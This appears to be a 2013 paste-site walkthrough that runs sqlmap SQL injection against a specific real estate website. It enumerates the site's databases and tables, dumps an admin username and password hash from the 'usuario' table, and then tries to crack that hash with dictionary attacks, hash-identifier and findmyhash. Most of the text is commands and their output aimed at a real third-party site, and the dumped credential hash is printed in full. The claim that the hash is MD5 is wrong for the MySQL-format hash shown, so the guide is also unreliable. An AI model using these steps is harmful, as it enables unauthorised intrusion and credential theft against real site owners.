Sqlmap and Metasploit

a guest, May 12th, 2013
python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 -f -b --current-user --current-db --dbs --is-dba

[11:29:15] [INFO] fetching database names
[11:29:15] [INFO] the SQL query used returns 2 entries
[11:29:15] [INFO] resumed: "information_schema"
[11:29:15] [INFO] resumed: "invista_invista"
available databases [2]:
[*] information_schema
[*] invista_invista

python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12  --tables -D invista_invista
Database: invista_invista
back-end DBMS: MySQL 5
[11:34:09] [INFO] fetching tables for database: 'invista_invista'
[11:34:09] [INFO] the SQL query used returns 10 entries
[11:34:09] [INFO] resumed: "banners"
[11:34:09] [INFO] resumed: "bannersfesta"
[11:34:09] [INFO] resumed: "imoveis_bairro"
[11:34:09] [INFO] resumed: "imoveis_descricao"
[11:34:09] [INFO] resumed: "imoveis_finalidade"
[11:34:09] [INFO] resumed: "imoveis_fotos"
[11:34:09] [INFO] resumed: "imoveis_tipo"
[11:34:09] [INFO] resumed: "newsletter"
[11:34:09] [INFO] resumed: "noticias"
[11:34:09] [INFO] resumed: "usuario"
Database: invista_invista
[10 tables]
+--------------------+
| banners            |
| bannersfesta       |
| imoveis_bairro     |
| imoveis_descricao  |
| imoveis_finalidade |
| imoveis_fotos      |
| imoveis_tipo       |
| newsletter         |
| noticias           |
| usuario            |
+--------------------+

python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario
[11:37:33] [INFO] the SQL query used returns 2 entries
[11:37:33] [INFO] resumed: "u2_usuario","varchar(255)"
[11:37:33] [INFO] resumed: "u3_senha","varchar(255)"
Database: invista_invista
Table: usuario
[2 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| u2_usuario | varchar(255) |
| u3_senha   | varchar(255) |
+------------+--------------+

python sqlmap.py -u http://www.invistaconquista.com.br/imoveis_detalhes.php?id=12 --columns -D invista_invista -T usuario -C u2_usuario,u3_senha
Database : invista_invista
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default) <--- accept

this step accepts the sqlmap dictionary
[2] as exact column names
[11:42:38] [INFO] fetching columns like 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'
[11:42:38] [INFO] the SQL query used returns 2 entries
[11:42:38] [INFO] resumed: "u2_usuario","varchar(255)"
[11:42:38] [INFO] resumed: "u3_senha","varchar(255)"
[11:42:39] [INFO] fetching entries of column(s) 'u2_usuario, u3_senha' for table 'usuario' in database 'invista_invista'
[11:42:39] [INFO] the SQL query used returns 1 entries
[11:42:40] [WARNING] reflective value(s) found and filtering out
[11:42:40] [INFO] retrieved: "invista","*1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24"
[11:42:41] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'u3_senha'. Do you want to crack them via a dictionary-based attack? [Y/n/q] <--- yes
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter) <--- accept
[2] custom dictionary file
[3] file with list of dictionary files
[11:44:09] [INFO] using default dictionary
[11:44:09] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] <--- yes
[11:44:39] [INFO] starting dictionary-based cracking (mysql_passwd)
[11:44:39] [INFO] starting 2 processes

[11:45:09] [INFO] using suffix '12'   <--- repeats several times (normal)
Database: invista_invista
Table: usuario
[1 entry]
+-------------------------------------------+------------+
| u3_senha                                  | u2_usuario |
+-------------------------------------------+------------+
| *1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 | invista    |
+-------------------------------------------+------------+
passwords are almost always in MD5

To identify it we will use hash-identifier:
/pentest/passwords/hash-identifier#
/pentest/passwords/hash-identifier#./hash_id.py
 #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/   \/_/\/_/    \/_____/ \/___/ v1.1 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH:  1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24 <-- paste the password here

IF IT IS NOT FOUND, USE THIS PROGRAM TO SEE IF IT CRACKS
https://code.google.com/p/findmyhash/downloads/detail?name=findmyhash_v1.1.2.py

LIKE THIS
cd Desktop
Desktop#python findmyhash_v1.1.2.py -MD5 -h  1AC0E47A8D7C4C3F3E5C8990D978D092B3BF5D24
if it shows that it is cracked, it worked

Note: after downloading the program, right-click it, choose Properties, then Permissions,
and select the last option, "execute as program".